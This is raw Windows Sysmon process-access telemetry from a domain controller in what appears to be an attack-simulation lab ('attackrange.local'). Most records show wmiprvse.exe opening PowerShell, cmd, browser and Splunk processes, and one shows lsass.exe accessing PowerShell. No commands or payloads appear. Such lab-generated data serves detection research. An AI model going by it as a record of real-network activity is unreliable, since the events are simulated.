16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 